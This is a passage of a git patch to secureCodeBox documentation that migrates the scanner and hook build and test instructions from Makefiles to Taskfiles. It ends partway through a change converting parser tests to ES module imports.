`Taskfile.yaml` in your hook directory with the following content: + +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + hook: + taskfile: ../Taskfile.yaml + flatten: true + vars: + hookName: your-hook-name # Replace with your hook's name + +tasks: {} +``` + +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your hook name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your hook | +| deploy | Deploys your hook helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your hook unit tests | +| test:integration | Run integration tests for your hook | +| test:helm | Run helm tests for your hook | +| test | Run all tests (unit, helm, and integration) | + +## Running Tests + +To run tests for your hook, you can use the following commands: + +```bash +# Run only unit tests +task test:unit + +# Run only integration tests +task test:integration + +# Run only helm unit tests +task test:helm + +# Run all tests (unit, helm, and integration) +task test +``` + +## Customizing Your Taskfile + +### Adding Custom Tasks + +You can add custom tasks specific to your hook by defining them in the `tasks` section: + +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my hook" +``` + +### Customizing Deployment + +If you need to customize the deployment process, you can override the `predeploy` task: + +```yaml +tasks: + predeploy: + desc: "Prepare environment for hook deployment" + cmds: + - kubectl create namespace my-hook-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-hook-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Adding Test Dependencies (demo-targets) + +To add test dependencies, you can create a custom task that runs before the integration tests: + +```yaml +tasks: + deploy-test-deps: + desc: "Deploy test dependencies for my hook" + cmds: + - task: demo-targets:deploy-http-webhook + - task: demo-targets:deploy-test-scan +``` + +### Changing the Unit Test Language + +If your hook is written in a language other than JavaScript, you can customize the test:unit task: + +```yaml +tasks: + test:unit: + desc: "Run Java unit tests for my hook" + cmds: + - cd {{ .TASKFILE_DIR }}/{{ .hookName }}/hook && ./gradlew test +``` + +## Testing Environment Setup + +Before running integration tests, make sure you have set up the testing environment: + +```bash +# From the project root directory +task prepare-testing-env +``` + +This will create a kind cluster and deploy the secureCodeBox operator. \ No newline at end of file diff --git a/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md b/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md index b816424ac1..dfe90f70b6 100644 --- a/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md +++ b/documentation/docs/contributing/integrating-a-scanner/integrating-a-scanner.md @@ -26,6 +26,8 @@ scanners/nmap │   │   ├── nmap-results.xml │   │   └── scan.yaml │   └── ... +├── integration-tests +│   ├── nmap.test.js ├── parser │   ├── Dockerfile │   ├── package.json @@ -42,7 +44,7 @@ scanners/nmap │   └── Dockerfile ├── Chart.yaml ├── values.yaml -├── Makefile +├── Taskfile.yaml ├── README.md ├── .helm-docs.gotmpl ├── .helmignore diff --git a/documentation/docs/contributing/integrating-a-scanner/integration-tests.md b/documentation/docs/contributing/integrating-a-scanner/integration-tests.md index ce6655b826..fc28beb34f 100644 --- a/documentation/docs/contributing/integrating-a-scanner/integration-tests.md +++ b/documentation/docs/contributing/integrating-a-scanner/integration-tests.md @@ -40,7 +40,7 @@ test( } `); }, - 3 * 60 * 1000, + { timeout: 3 * 60 * 1000 }, ); ``` @@ -61,7 +61,7 @@ higher than the timeout provided above. ## Run your integration tests locally -Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [makefile](/docs/contributing/integrating-a-scanner/makefile) to run your integration tests locally. +Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [Taskfile](/docs/contributing/integrating-a-scanner/taskfile) to run your integration tests locally. ## Integrate in ci.yaml diff --git a/documentation/docs/contributing/integrating-a-scanner/makefile.md b/documentation/docs/contributing/integrating-a-scanner/makefile.md index 940cf2edd3..cedcfb1247 100644 --- a/documentation/docs/contributing/integrating-a-scanner/makefile.md +++ b/documentation/docs/contributing/integrating-a-scanner/makefile.md @@ -3,77 +3,123 @@ # # SPDX-License-Identifier: Apache-2.0 -title: Makefile +title: Taskfile sidebar_position: 4 --- -To test your scanner locally, you may use the following makefile. +To test your scanner locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. -```makefile -#!/usr/bin/make -f +## Basic Scanner Taskfile -include_guard = set # Always include this line (checked in the makefile framework) -scanner = angularjs-csti-scanner # The name of your scanner -custom_scanner = set # Include this line if your scanner has a dockerfile +Create a `Taskfile.yaml` in your scanner directory with the following content: -include ../../scanners.mk # Ensures that all the default makefile targets are included +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: your-scanner-name # Replace with your scanner's name + +tasks: {} ``` -See [Local Deployment](/docs/contributing/local-deployment) for examples how to use the Makefiles. +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your scanner name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your parser (& scanner if custom scanner is defined) | +| deploy | Deploys your scanner helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your parser unit tests | +| test:integration | Run integration tests for your scanner | +| test:helm | Run helm tests for your scanner | +| test | Run all tests (unit, helm, and integration) | -## Available makefile targets +## Running Tests -| Target | Use | -| --------------------------------- | ------------------------------------------------------------------------------------ | -| reset-integration-tests-namespace | Resets the integration-tests namespace | -| unit-tests | Run your parser unit tests | -| docker-build | Builds your parser (& scanner) | -| docker-export | Exports your parser (& scanner) into a .tar file | -| kind-import | Loads your parser (& scanner) .tar files into your local kind cluster | -| deploy | Deploys your scanner helm chart into your local kind cluster | -| deploy-test-deps | Deploys your scanner's test dependencies (demo-targets) into your local kind cluster | -| integration-tests | Deletes all scans and runs your integration test `scanners/SCANNER_NAME.test.js` | +To run tests for your scanner, you can use the following commands: -## Configuring your makefile (examples) +```bash +# Run only unit tests +task test:unit -### Adding test dependencies (demo-targets) +# Run only integration tests +task test:integration + +# Run all tests (unit, helm, and integration) +task test +``` -```makefile -#!/usr/bin/make -f +## Customizing Your Taskfile -include_guard = set -scanner = wpscan +### Adding Custom Tasks -include ../../scanners.mk +You can add custom tasks specific to your scanner by defining them in the `tasks` section: -deploy-test-deps: deploy-test-dep-old-wordpress +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my scanner" ``` -This adds the old-wordpress demo-target to your integration tests. You can find all available demo-targets in `common.mk`. +### Customizing Deployment -### Overriding helm deploy configurations +If you need to customize the deployment process, you can override the `predeploy` task: -```makefile -#!/usr/bin/make -f -include_guard = set -scanner = nmap -custom_scanner = set +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + cmds: + - kubectl create namespace my-scanner-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-scanner-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Adding Test Dependencies + +To add test dependencies (demo-targets), you can create a custom task that runs before the integration tests: + +```yaml +tasks: + deploy-test-deps: + desc: "Deploy test dependencies for my scanner" + cmds: + - kubectl create namespace my-scanner-tests --dry-run=client -o yaml | kubectl apply -f - + - helm -n my-scanner-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +``` + +### Overriding Helm Deploy Configurations + +You can customize the Helm deployment by setting additional variables: + +```yaml +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: my-scanner + additionalHelmInstallArgsForScanner: "--set=scanner.env.MY_VAR=my-value" +``` -include ../../scanners.mk +## Testing Environment Setup -deploy-with-scanner: - @echo ".: 💾 Deploying custom '$(scanner)' scanner HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(scanner) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(scanner)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="scanner.image.repository=docker.io/$(IMG_NS)/$(scanner-prefix)-$(scanner)" \ - --set="scanner.image.tag=$(IMG_TAG)" +Before running integration tests, make sure you have set up the testing environment: -deploy-test-deps: - # If not exists create namespace where the tests will be executed - kubectl create namespace nmap-tests --dry-run=client -o yaml | kubectl apply -f - - # Install jshop in nmap-tests namespace - helm -n nmap-tests upgrade --install juice-shop ../../demo-targets/juice-shop/ --wait +```bash +# From the project root directory +task prepare-testing-env ``` -Furthermore, it overrides the deploy-test-deps target such that juice-shop is installed in the correct namespace (nmap-tests). +This will create a kind cluster and deploy the secureCodeBox operator. diff --git a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md index e0e01c0e80..5c0ac46331 100644 --- a/documentation/docs/contributing/integrating-a-scanner/parser-dir.md +++ b/documentation/docs/contributing/integrating-a-scanner/parser-dir.md @@ -45,7 +45,7 @@ See [Local Deployment](/docs/contributing/local-deployment) for instructions on To create a parser for your scanner you will have to execute the following steps in the parser directory: -### Create a new package.json (using `npm init`) +### Create a new package.json (using `npm init`) (if you require external dependencies) Your `package.json` should look something like this: @@ -67,7 +67,10 @@ Your `package.json` should look something like this: } ``` -### Install The Dependencies +Note: you only need this if you require dependencies (e.g. a XML parser) which aren't build into node.js. +If you do not need dependencies you should not create a package.json and remove the build step from the Dockerfile. It's unended overhead. + +#### Install The Dependencies If you need additional dependencies you can install them via `npm install`. @@ -76,11 +79,9 @@ If you need additional dependencies you can install them via `npm install`. Create a `parser.js` file and update the parser function of the Parser SDK. A starting point would be: ```javascript -async function parse(fileContent) { +export async function parse(fileContent) { return []; } - -module.exports.parse = parse; ``` After your scanner has finished, the Parser SDK will retrieve the output results and call your custom parse function `parse`. The SDK expects a finding object as specified in [Finding | secureCodeBox](/docs/api/finding). The `id`, `parsed_at` and `identified_at` fields can be omitted, as they will be added by the Parser SDK. @@ -90,9 +91,7 @@ After your scanner has finished, the Parser SDK will retrieve the output results Please provide some tests for your parser in the `parser.test.js` file. To make sure that the output complies with the format specified in [Finding | secureCodeBox](/docs/api/finding) you should call the method `validateParser(parseResult)` from the ParserSDK and assert that it must resolve (not throw errors). You can do so e.g. by calling the following code. See the already existing parsers for reference. ```javascript -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -100,4 +99,4 @@ await expect(validateParser(findings)).resolves.toBeUndefined(); If you need additional files for your test please save these in the `__testFiles__` directory. Please take a look at [Integration Tests | secureCodeBox](/docs/contributing/integrating-a-scanner/integration-tests) for more information. -Assuming you've set up the scanner [makefile](/docs/contributing/integrating-a-scanner/makefile), you can run your unit test with `make unit-tests`. +Assuming you've set up the scanner [Taskfile](/docs/contributing/integrating-a-scanner/taskfile), you can run your unit test with `task test:unit`. diff --git a/documentation/docs/contributing/integrating-a-scanner/taskfile.md b/documentation/docs/contributing/integrating-a-scanner/taskfile.md new file mode 100644 index 0000000000..57a58e0e49 --- /dev/null +++ b/documentation/docs/contributing/integrating-a-scanner/taskfile.md @@ -0,0 +1,131 @@ +--- +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +title: Taskfile +sidebar_position: 4 +--- + +To test your scanner locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. + +## Basic Scanner Taskfile + +Create a `Taskfile.yaml` in your scanner directory with the following content: + +```yaml +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: your-scanner-name # Replace with your scanner's name + +tasks: {} +``` + +This minimal configuration includes all the common tasks defined in the parent Taskfile and sets your scanner name as a variable. + +## Available Tasks + +| Task | Description | +|------------------------|----------------------------------------------------------------------------| +| build | Builds your parser (& scanner if custom scanner is defined) | +| deploy | Deploys your scanner helm chart into your local kind cluster | +| predeploy | Can be overridden to perform any pre-deployment steps | +| test:unit | Run your parser unit tests | +| test:integration | Run integration tests for your scanner | +| test:helm | Run helm tests for your scanner | +| test | Run all tests (unit, helm, and integration) | + +## Running Tests + +To run tests for your scanner, you can use the following commands: + +```bash +# Run only unit tests +task test:unit + +# Run only integration tests +task test:integration + +# Run only helm unit tests +task test:helm + +# Run all tests (unit, helm, and integration) +task test +``` + +## Customizing Your Taskfile + +### Adding Custom Tasks + +You can add custom tasks specific to your scanner by defining them in the `tasks` section: + +Generally we try to keep all the tasks for scanner and hooks standardized for easier maintenance. + +```yaml +tasks: + custom-task: + desc: "My custom task description" + cmds: + - echo "Running custom task for my scanner" +``` + +### Customizing Deployment + +If you need to customize the deployment process, you can override the `predeploy` task: + +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + cmds: + - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests +``` + +### Adding Test Dependencies + +To add test dependencies (demo-targets), you can call the demo-target deploy tasks which are automatically available. + +```yaml +tasks: + predeploy: + desc: "Prepare environment for scanner deployment" + deps: + - demo-targets:deploy:bodgeit + - demo-targets:deploy:juice-shop + # see demo-targets/Taskfile.yaml for all available demo targets. (the task needs to be prefixed here with the `demo-target:` namespace) +``` + +### Overriding Helm Deploy Configurations + +You can customize the Helm deployment by setting additional variables: + +```yaml +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: my-scanner + additionalHelmInstallArgsForScanner: | + --set="helmValue.enabled=false" \ # needs to end in a backslash as its inserted into a multi line bash +``` + +## Testing Environment Setup + +Before running integration tests, make sure you have set up the testing environment: + +```bash +# From the project root directory +task prepare-testing-env +``` + +This will create a kind cluster and deploy the secureCodeBox operator. \ No newline at end of file diff --git a/documentation/docs/contributing/local-deployment.md b/documentation/docs/contributing/local-deployment.md index 9b445fcb8a..fd4151197b 100644 --- a/documentation/docs/contributing/local-deployment.md +++ b/documentation/docs/contributing/local-deployment.md @@ -9,117 +9,170 @@ sidebar_position: 3 If you are integrating a new scanner or hook and want to test from a local build, this document will guide you through it. For simplicity's sake, this guide is written only for local cluster setups using [kind](https://kind.sigs.k8s.io/). -Other setups (e.g., minikube, Docker Desktop's integrated Kubernetes) are possible but might require extra setup and tweaking efforts to run with our make files. +Other setups (e.g., minikube, Docker Desktop's integrated Kubernetes) are possible but might require extra setup and tweaking efforts to run with our task files. We also assume that you are or have followed the steps in either the [Integrating A Scanner](/docs/contributing/integrating-a-scanner) or [Integrating A Hook](/docs/contributing/integrating-a-hook) guide. ## Kind Cluster Setup -1. Firstly, create the kind cluster: `kind create cluster` -2. Install the secureCodeBox operator. See [installation](/docs/getting-started/installation/) -3. Create the `integration-tests` namespace: `kubectl create namespace integration-tests` +Easiest way to setup a kind cluster for running secureCodeBox for local development is to use the task `task prepare-testing-env` command. +This will start a kind cluster with the name testing-env and build the operator and deploy it to the cluster. +IF you intent to use it to run the integration tests for a scanner or hook you can skip this as the test:integration tasks will automatically set this up too, if it isn't already running. -## Makefile-based build & deploy (recommended) +## Taskfile-based build & deploy (recommended) -To make local testing easier, the secureCodeBox team has provided a Makefile based solution. The specific Make targets and examples to customize them are given in these documents: +To make local testing easier, the secureCodeBox team has provided a Taskfile based solution. The specific Task targets and examples to customize them are given in these documents: -- [Makefile targets scanners](/docs/contributing/integrating-a-scanner/makefile) -- [Makefile targets hooks](/docs/contributing/integrating-a-hook/makefile) +- [Taskfile targets scanners](/docs/contributing/integrating-a-scanner/taskfile) +- [Taskfile targets hooks](/docs/contributing/integrating-a-hook/taskfile) This document explains how to use these targets to deploy your scanner locally. **Scanner only:** -1. Inspect your scanner's Makefile. - If your scanner uses a remote Docker image (such as one hosted on Dockerhub), you can comment out or remove the `custom_scanner` line. +1. Inspect your scanner's Taskfile.yaml. + If your scanner uses a remote Docker image (such as one hosted on Dockerhub), the `hasCustomScanner` variable will automatically be set to false. If you have defined your own Dockerfile in the `scanner/` directory, you should leave the line as-is. 2. In the root of the secureCodeBox git repository, under `hook-sdk/nodejs/` and `parser-sdk/nodejs/`, you need to build the Dockerfiles. This ensures that you have the latest version of the SDK available locally. You need this in order to build secureCodeBox parsers and hooks. To build the image: - **Kind**: run `make docker-build`. + **Kind**: run `task build`. 3. In your scanner or hook directory, build the Dockerfiles: - **Kind**: run `make docker-build docker-export kind-import`. + **Kind**: run `task build`. -4. Run `make deploy` to install your Helm chart in your active Kubernetes cluster into the `integration-tests` namespace. - The make target ensures that the image name and tag matches that built in the previous step. +4. Run `task deploy` to install your Helm chart in your active Kubernetes cluster into the `integration-tests` namespace. + The task ensures that the image name and tag matches that built in the previous step. 5. Now run an example scan and inspect whether the images are correctly used. ### Example shell ```shell -securecodebox$ kind create cluster -Creating cluster "kind" ... - ✓ Ensuring node image (kindest/node:v1.27.3) đŸ–ŧ - ✓ Preparing nodes đŸ“Ļ - ✓ Writing configuration 📜 - ✓ Starting control-plane 🕹ī¸ - ✓ Installing CNI 🔌 - ✓ Installing StorageClass 💾 -Set kubectl context to "kind-kind" -[...] -securecodebox$ helm repo add secureCodeBox https://charts.securecodebox.io -[...] -securecodebox$ kubectl create namespace securecodebox-system -namespace/securecodebox-system created -securecodebox$ helm --namespace securecodebox-system upgrade --install securecodebox-operator oci://ghcr.io/securecodebox/helm/operator +securecodebox$ task prepare-testing-env +task: [create-kind-cluster] echo "Starting kind cluster for testing environment" +Starting kind cluster for testing environment +task: [create-kind-cluster] kind create cluster --name testing-env +Creating cluster "testing-env" ... + ✓ Ensuring node image (kindest/node:v1.33.1) đŸ–ŧ + ✓ Preparing nodes đŸ“Ļ + ✓ Writing configuration 📜 + ✓ Starting control-plane 🕹ī¸ + ✓ Installing CNI 🔌 + ✓ Installing StorageClass 💾 +Set kubectl context to "kind-testing-env" +You can now use your cluster with: + +kubectl cluster-info --context kind-testing-env + +Have a nice day! 👋 +task: [build-lurker-image] echo "Building lurker image with tag ${IMG_TAG}" +task: [build-operator-image] echo "Building operator image with tag ${IMG_TAG}" +Building lurker image with tag sha-a2d8ce1aa +task: [build-lurker-image] docker build -t ${IMG_NS}/lurker:${IMG_TAG} /src/secureCodeBox/lurker +Building operator image with tag sha-a2d8ce1aa +task: [build-operator-image] docker build -t ${IMG_NS}/operator:${IMG_TAG} /src/secureCodeBox/operator +[+] Building 1.0s (4/4) docker:desktop-linux +[+] Building 1.0s (3/3) docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 966B 0.0s +[+] Building 1.1s (20/20) FINISHED docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 966B 0.0s + => [internal] load metadata for gcr.io/distroless/static:nonroot 0.4s + => [internal] load metadata for docker.io/library/golang:1.24.2 1.0s + => [auth] library/golang:pull token for registry-1.docker.io 0.0s + => [internal] load .dockerignore 0.0s + => => transferring context: 291B 0.0s + => [builder 1/11] FROM docker.io/library/golang:1.24.2@sha256:30baaea08c5d1e858329c50f29fe381e9b7d7bced11a0f5f1f69a1504cdfbf5 0.0s + => [stage-1 1/3] FROM gcr.io/distroless/static:nonroot@sha256:627d6c5a23ad24e6bdff827f16c7b60e0289029b0c79e9f7ccd54ae3279fb45f 0.0s + => [internal] load build context 0.0s + => => transferring context: 2.91kB 0.0s + => CACHED [builder 2/11] WORKDIR /workspace 0.0s + => CACHED [builder 3/11] COPY go.mod go.mod 0.0s + => CACHED [builder 4/11] COPY go.sum go.sum 0.0s + => CACHED [builder 5/11] RUN go mod download 0.0s + => CACHED [builder 6/11] COPY main.go main.go 0.0s + => CACHED [builder 7/11] COPY apis/ apis/ 0.0s + => CACHED [builder 8/11] COPY controllers/ controllers/ 0.0s + => CACHED [builder 9/11] COPY internal/ internal/ 0.0s + => CACHED [builder 10/11] COPY utils/ utils/ 0.0s + => CACHED [builder 11/11] RUN CGO_ENABLED=0 go build -a -o manager main.go 0.0s + => CACHED [stage-1 2/3] COPY --from=builder /workspace/manager . 0.0s + => exporting to image 0.0s +[+] Building 1.1s (15/15) FINISHED docker:desktop-linux + => [internal] load build definition from Dockerfile 0.0s + => => transferring dockerfile: 820B 0.0s + => [internal] load metadata for docker.io/library/golang:1.24.2 1.0s + => [internal] load metadata for gcr.io/distroless/static:nonroot 0.4s + => [internal] load .dockerignore 0.0s + => => transferring context: 171B 0.0s + => [builder 1/11] FROM docker.io/library/golang:1.24.2@sha256:30baaea08c5d1e858329c50f29fe381e9b7d7bced11a0f5f1f69a1504cdfbf5 0.0s + => [stage-1 1/3] FROM gcr.io/distroless/static:nonroot@sha256:627d6c5a23ad24e6bdff827f16c7b60e0289029b0c79e9f7ccd54ae3279fb45f 0.0s + => [internal] load build context 0.0s + => => transferring context: 81B 0.0s + => CACHED [builder 2/11] WORKDIR /workspace 0.0s + => CACHED [builder 3/7] COPY go.mod go.mod 0.0s + => CACHED [builder 4/7] COPY go.sum go.sum 0.0s + => CACHED [builder 5/7] RUN go mod download 0.0s + => CACHED [builder 6/7] COPY main.go main.go 0.0s + => CACHED [builder 7/7] RUN CGO_ENABLED=0 go build -a -o lurker main.go 0.0s + => CACHED [stage-1 2/3] COPY --from=builder /workspace/lurker . 0.0s + => exporting to image 0.0s + => => exporting layers 0.0s + => => writing image sha256:5a13c7c870b49203029c1aa85d273e5425ad3e28ca57167c03e822d665db576a 0.0s + => => naming to docker.io/securecodebox/lurker:sha-a2d8ce1aa 0.0s + +View build details: docker-desktop://dashboard/build/desktop-linux/desktop-linux/7zgy8kalere960epa2fpujgb8 + +What's next: + View a summary of image vulnerabilities and recommendations → docker scout quickview + +What's next: + View a summary of image vulnerabilities and recommendations → docker scout quickview +task: [load-operator-image] kind load docker-image ${IMG_NS}/operator:${IMG_TAG} --name testing-env +task: [load-lurker-image] kind load docker-image ${IMG_NS}/lurker:${IMG_TAG} --name testing-env +Image: "securecodebox/lurker:sha-a2d8ce1aa" with ID "sha256:5a13c7c870b49203029c1aa85d273e5425ad3e28ca57167c03e822d665db576a" not yet present on node "testing-env-control-plane", loading... +Image: "securecodebox/operator:sha-a2d8ce1aa" with ID "sha256:d72d1321720f9df4b6ead554c42f09e382ea8be9652a5bcd500cf051e3ca3981" not yet present on node "testing-env-control-plane", loading... +task: [deploy-operator] echo "Deploying secureCodeBox operator to the testing environment" +Deploying secureCodeBox operator to the testing environment +task: [deploy-operator] kubectl config use-context kind-testing-env +Switched to context "kind-testing-env". +task: [deploy-operator] kubectl create namespace integration-tests || true +namespace/integration-tests created +task: [deploy-operator] helm -n securecodebox-system upgrade --create-namespace --install securecodebox-operator /src/secureCodeBox/operator --wait \ + --set="image.repository=docker.io/${IMG_NS}/operator" \ + --set="image.tag=${IMG_TAG}" \ + --set="image.pullPolicy=IfNotPresent" \ + --set="lurker.image.repository=docker.io/${IMG_NS}/lurker" \ + --set="lurker.image.tag=${IMG_TAG}" \ + --set="lurker.image.pullPolicy=IfNotPresent" + Release "securecodebox-operator" does not exist. Installing it now. NAME: securecodebox-operator -LAST DEPLOYED: Fri Jan 26 14:34:50 2024 +LAST DEPLOYED: Fri Jul 11 10:03:12 2025 NAMESPACE: securecodebox-system STATUS: deployed REVISION: 1 TEST SUITE: None NOTES: secureCodeBox Operator Deployed 🚀 -[...] -securecodebox$ kubectl create namespace integration-tests -namespace/integration-tests created -securecodebox$ cd parser-sdk/nodejs/ -securecodebox/parser-sdk/nodejs$ make docker-build -.: ⚙ī¸ Build 'parser-sdk'. -docker build -t securecodebox/parser-sdk-nodejs:"sha-$(git rev-parse --short HEAD)" . -[...] -Successfully built af5faaf0be6e -Successfully tagged securecodebox/parser-sdk-nodejs:sha-a4490167 -securecodebox/parser-sdk/nodejs$ cd ../../scanners/nmap/ -securecodebox/scanners/nmap$ make docker-build docker-export kind-import -.: ⚙ī¸ Build 'nmap' parser with BASE_IMG_TAG: 'sha-a4490167'. -[...] -[Warning] One or more build-args [scannerVersion] were not consumed -Successfully built 931ac83a3e42 -Successfully tagged securecodebox/parser-nmap:sha-a4490167 -.: ⚙ī¸ Build 'nmap' scanner with BASE_IMG_TAG: 'sha-a4490167'. -[...] -[Warning] One or more build-args [baseImageTag namespace] were not consumed -Successfully built 721c154357eb -Successfully tagged securecodebox/scanner-nmap:sha-a4490167 -.: ⚙ī¸ Saving new docker image archive to 'parser-nmap.tar'. -.: ⚙ī¸ Saving new docker image archive to 'scanner-nmap.tar'. -.: 💾 Importing the image archive 'parser-nmap.tar' to local kind cluster. -.: 💾 Importing the image archive 'scanner-nmap.tar' to local kind cluster. -securecodebox/scanners/nmap$ make deploy -.: 💾 Deploying 'nmap' scanner HelmChart with the docker tag 'sha-a4490167' into kind namespace 'integration-tests'. -[...] -Release "nmap" does not exist. Installing it now. -NAME: nmap -LAST DEPLOYED: Fri Jan 26 14:35:27 2024 -NAMESPACE: integration-tests -STATUS: deployed -REVISION: 1 -TEST SUITE: None -securecodebox/scanners/nmap$ kubectl get scantypes.execution.securecodebox.io -n integration-tests -NAME IMAGE -nmap docker.io/securecodebox/scanner-nmap:sha-a4490167 -securecodebox/scanners/nmap$ kubectl get parsedefinitions.execution.securecodebox.io -n integration-tests -NAME IMAGE -nmap-xml docker.io/securecodebox/parser-nmap:sha-a4490167 + +The operator can orchestrate the execution of various security scanning tools inside of your cluster. +You can find a list of all officially supported scanners here: https://www.securecodebox.io/ +The website also lists other integrations, like persisting scan results to DefectDojo or Elasticsearch. + +The operator send out regular telemetry pings to a central service. +This lets us, the secureCodeBox team, get a grasp on how much the secureCodeBox is used. +The submitted data is chosen to be as anonymous as possible. +You can find a complete report of the data submitted and links to the source-code at: https://www.securecodebox.io/docs/telemetry +The first ping is send one hour after the install, you can prevent this by upgrading the chart and setting `telemetryEnabled` to `false`. ``` :::note -Notice that the Make target automatically feeds the chart's `AppVersion` into the `scannerVersion` build arg. +Notice that the Task automatically feeds the chart's `AppVersion` into the `scannerVersion` build arg. ::: ## Manual build & deploy @@ -234,7 +287,7 @@ You can also check if the image is actually available: Don't forget that all images used in your Kubernetes cluster must be either remotely accessible or locally available within the cluster. - **Kind**: imported after building - - Using Makefile: `make docker-export kind-import`. + - Using Taskfile: `task build`. - Manually: `kind load docker-image parser-nmap:[tag]`. ### Namespace diff --git a/documentation/docs/contributing/test-concept/hook-test.md b/documentation/docs/contributing/test-concept/hook-test.md index 815e3b2757..1fecc7781c 100644 --- a/documentation/docs/contributing/test-concept/hook-test.md +++ b/documentation/docs/contributing/test-concept/hook-test.md @@ -188,7 +188,7 @@ test("Should create no subsequent scans if there are no rules", () => { To run a unit-test, it suffices to run ```bash -make unit-tests +task test:unit ``` in the hook's directory. @@ -226,7 +226,7 @@ test( high: 1, }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 } ); ``` @@ -235,12 +235,12 @@ For this test to be considered successful, it has to match the expected conditio To run the test it suffices to run: ```bash -make test +task test ``` All previous tests will be deleted and the current test will be run on a clean slate. If no clean install is needed before running the test, it is possible to run only the tests themselves through: ```bash -make integration-tests +task test:integration ``` diff --git a/documentation/docs/contributing/test-concept/index.md b/documentation/docs/contributing/test-concept/index.md index af59cd4542..f0b9f0d5e9 100644 --- a/documentation/docs/contributing/test-concept/index.md +++ b/documentation/docs/contributing/test-concept/index.md @@ -24,5 +24,5 @@ The following articles describe how each module implements its unit and integrat * [Scanner](/docs/contributing/test-concept/scanner-test) * [Hook](/docs/contributing/test-concept/hook-test) -We use Make as a basis for our testing framework. The Makefiles expect additional software to be installed: -git, node + npm, docker, kind, kubectl, helm and [yq](https://github.com/mikefarah/yq/). +We use [Task](https://taskfile.dev/) as a basis for our testing framework. The Taskfiles expect additional software to be installed: +git, node + npm, bun, docker, kind, kubectl, helm and [yq](https://github.com/mikefarah/yq/). diff --git a/documentation/docs/contributing/test-concept/scanner-test.md b/documentation/docs/contributing/test-concept/scanner-test.md index ddf1ce3c47..1d8a897e44 100644 --- a/documentation/docs/contributing/test-concept/scanner-test.md +++ b/documentation/docs/contributing/test-concept/scanner-test.md @@ -34,7 +34,7 @@ This test for example expects a test file, i.e a raw scanner output, to be found To run a unit-test it suffices to run ```bash -make unit-tests +task test:unit ``` in the scanner directory. @@ -64,12 +64,12 @@ For this test to be considered successful, it has to match the expected conditio To run the test it suffices to run: ```bash -make test +task test ``` All previous tests will be deleted and the current test will be run on a clean slate. If no clean install is needed before running the test, it is possible to run only the tests themselves through: ```bash -make integration-tests +task test:integration ``` From 70029b93f05ff45e0714c55088776b032b07ea2f Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:35:44 +0200 Subject: [PATCH 124/137] Migrate left over require usages in tests wasn't causing problems as bun can handle it, but its inconsistent --- scanners/gitleaks/parser/parser.test.js | 8 +++----- scanners/trivy/parser/parser.test.js | 8 +++----- 2 files changed, 6 insertions(+), 10 deletions(-) diff --git a/scanners/gitleaks/parser/parser.test.js b/scanners/gitleaks/parser/parser.test.js index 2c89506b62..fd83d8f03b 100644 --- a/scanners/gitleaks/parser/parser.test.js +++ b/scanners/gitleaks/parser/parser.test.js @@ -2,12 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse empty gitleaks json 